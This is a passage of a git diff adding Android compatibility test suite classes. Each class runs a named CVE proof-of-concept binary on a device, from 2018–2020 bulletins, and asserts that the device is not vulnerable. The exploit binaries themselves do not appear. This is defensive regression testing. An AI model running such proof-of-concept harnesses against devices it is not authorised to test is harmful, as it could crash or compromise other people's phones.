specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2018_9563 extends SecurityTestCase { + + /** + * b/114237888 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2018_9563() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9563", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java new file mode 100644 index 00000000000..5d68ce6305e --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java @@ -0,0 +1,39 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2018_9584 extends SecurityTestCase { + + /** + * b/114047681 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-01") + @Test + public void testPocCVE_2018_9584() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9584", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java new file mode 100644 index 00000000000..f5d19e4cc3a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java @@ -0,0 +1,39 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2018_9585 extends SecurityTestCase { + + /** + * b/117554809 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-01") + @Test + public void testPocCVE_2018_9585() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9585", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java new file mode 100644 index 00000000000..718878cc79c --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java @@ -0,0 +1,36 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2007 extends SecurityTestCase { + + /** + * b/120789744 + * Vulnerability Behaviour: EXIT_VULNERABLE (113) + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2019_2007() throws Exception { + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2007", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java new file mode 100644 index 00000000000..d2f60c79f9a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2013 extends SecurityTestCase { + + /** + * b/120497583 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2019_2013() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2013", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java new file mode 100644 index 00000000000..c70f560cfbe --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java @@ -0,0 +1,43 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.compatibility.common.util.CrashUtils; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2014 extends SecurityTestCase { + + /** + * b/120499324 + * Vulnerability Behaviour: SIGABRT in self + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2019_2014() throws Exception { + pocPusher.only64(); + String binaryName = "CVE-2019-2014"; + String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.setSignals(signals); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java new file mode 100644 index 00000000000..cd61170fc6a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2019 extends SecurityTestCase { + + /** + * b/115635871 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2019_2019() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2019", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java new file mode 100644 index 00000000000..0ac90e48244 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2035 extends SecurityTestCase { + + /** + * b/122320256 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-04") + @Test + public void testPocCVE_2019_2035() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2035", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java new file mode 100644 index 00000000000..2619ed97cdf --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2040 extends SecurityTestCase { + + /** + * b/122316913 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-04") + @Test + public void testPocCVE_2019_2040() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2040", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java new file mode 100644 index 00000000000..6072d129a74 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2044 extends SecurityTestCase { + + /** + * b/123701862 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-05") + @Test + public void testPocCVE_2019_2044() throws Exception { + pocPusher.only32(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2044", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2046.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2046.java new file mode 100644 index 00000000000..783bfa1d409 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2046.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.device.ITestDevice; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2046 extends SecurityTestCase { + + /** + * b/117556220 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-05") + @Test + public void testPocCVE_2019_2046() throws Exception { + pocPusher.only64(); + AdbUtils.runProxyAutoConfig("cve_2019_2046", "true", getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java new file mode 100644 index 00000000000..e20bb5cc815 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2099 extends SecurityTestCase { + + /** + * b/123583388 + * Vulnerability Behaviour: EXIT_VULNERABLE (113) + **/ + @SecurityTest(minPatchLevel = "2019-06") + @Test + public void testPocCVE_2019_2099() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2099", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java new file mode 100644 index 00000000000..38c8be06e69 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java @@ -0,0 +1,37 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2115 extends SecurityTestCase { + + /** + * b/129768470 + * Vulnerability Behaviour: EXIT_VULNERABLE (113) + */ + @SecurityTest(minPatchLevel = "2019-09") + @Test + public void testPocCVE_2019_2115() throws Exception { + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2115", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0462.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java index fe42a0bd6b6..68332436dbb 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0462.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java @@ -16,31 +16,25 @@ package android.security.cts; -import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import android.platform.test.annotations.SecurityTest; import org.junit.Test; import org.junit.runner.RunWith; - import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; -import static org.junit.Assume.assumeTrue; -import static org.junit.Assert.*; - @RunWith(DeviceJUnit4ClassRunner.class) -public class CVE_2020_0462 extends SecurityTestCase { +public class CVE_2019_2135 extends SecurityTestCase { /** - * b/169161709 + * b/125900276 + * Vulnerability Behaviour: SIGSEGV in self */ + @SecurityTest(minPatchLevel = "2019-08") @Test - @SecurityTest(minPatchLevel = "2020-12") - public void testPocCVE_2020_0462() throws Exception { - assumeTrue(containsDriver(getDevice(), - "/sys/devices/system/cpu/vulnerabilities/spec_store_bypass")); - String spec_store_bypass = AdbUtils.runCommandLine( - "cat /sys/devices/system/cpu/vulnerabilities/spec_store_bypass", getDevice()); - assertFalse(spec_store_bypass.startsWith("Vulnerable")); - assertTrue(spec_store_bypass.startsWith("Not affected") || - spec_store_bypass.startsWith("Mitigation")); + public void testPocCVE_2019_2135() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE_2019_2135", null, getDevice()); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java new file mode 100644 index 00000000000..20396acedff --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2206 extends SecurityTestCase { + + /** + * b/139188579 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-11") + @Test + public void testPocCVE_2019_2206() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2206", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java new file mode 100644 index 00000000000..6f4340c159a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2207 extends SecurityTestCase { + + /** + * b/124524315 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-11") + @Test + public void testPocCVE_2019_2207() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2207", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java new file mode 100644 index 00000000000..efd1e548e27 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0006 extends SecurityTestCase { + + /** + * b/139738828 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-01") + @Test + public void testPocCVE_2020_0006() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0006", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java new file mode 100644 index 00000000000..e6241349987 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java @@ -0,0 +1,39 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0037 extends SecurityTestCase { + + /** + * b/143106535 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-03") + @Test + public void testPocCVE_2020_0037() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0037", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java new file mode 100644 index 00000000000..5731c12a91a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java @@ -0,0 +1,39 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0038 extends SecurityTestCase { + + /** + * b/143109193 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-03") + @Test + public void testPocCVE_2020_0038() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0038", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java new file mode 100644 index 00000000000..7d5ae378f34 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java @@ -0,0 +1,39 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0039 extends SecurityTestCase { + + /** + * b/143155861 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-03") + @Test + public void testPocCVE_2020_0039() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0039", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java new file mode 100644 index 00000000000..79826e7b940 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java @@ -0,0 +1,46 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import com.android.tradefed.device.ITestDevice; +import com.android.compatibility.common.util.CrashUtils; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0073 extends SecurityTestCase { + + /** + * b/147309942 + * Vulnerability Behaviour: SIGABRT in self + */ + @SecurityTest(minPatchLevel = "2020-04") + @Test + public void testPocCVE_2020_0073() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + String binaryName = "CVE-2020-0073"; + String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.setSignals(signals); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java new file mode 100644 index 00000000000..4cd94c9187f --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + 